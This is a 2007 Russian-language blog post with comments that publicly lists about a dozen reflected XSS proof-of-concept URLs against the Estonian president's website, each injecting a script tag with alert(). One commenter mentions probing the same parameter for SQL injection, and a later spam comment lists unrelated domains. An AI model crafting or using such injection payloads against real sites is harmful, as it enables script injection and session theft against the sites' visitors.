18 Мая, 2007

Президент эстонии

eston_gandon
Залез тут на сайт хакера и заметил заметку об XSS на сайте президента эстонии.
Случайно, непреднамеренно и без злого умысла обнаружил еще с десяток подобных дыр на его сайте

_http://www.president.ee/et/ametitegevus/?arhiiv=true&aasta=2007"><script></script>
_http://www.president.ee/et/ametitegevus/?gid=94518"><script>alert()</script>
_http://www.president.ee/show.image.php?gid="><script>alert()</script>
_http://www.president.ee/en/duties/?arhiiv=true&aasta=2007"><script>alert()</script>
_http://www.president.ee/en/duties/speeches.php?arhiiv=true&aasta=2007"><script>alert()</script>
_http://www.president.ee/et/institutsioonid/?gid=8192"><script>alert()</script>
_http://www.president.ee/et/president/?gid=8188"><script>alert()</script>
_http://www.president.ee/et/ametitegevus/?gid=94481"><script>alert()</script>
_http://www.president.ee/et/vabariik/?gid="><script>alert()</script>
_http://www.president.ee/en/estonia/constitution.php?gid=81910"><script>alert()</script>
_http://www.president.ee/et/president/proua_k6ned.php?arhiiv=true&aasta=2007"><script>alert()</script>

или введите имя

CAPTCHA
=
18 Мая, 2007
RE: Президент эстонии
а я в gid'е инъекцию искал
0 |
1
21 Мая, 2007
RE[2]: Президент эстонии
И еще не исправили их... да... это они так боряцца с преступростью )))
0 |
Eric
22 Июля, 2013
7kredit.ru you-wooman.ru delestroy.ru tobacco24.ru
0 |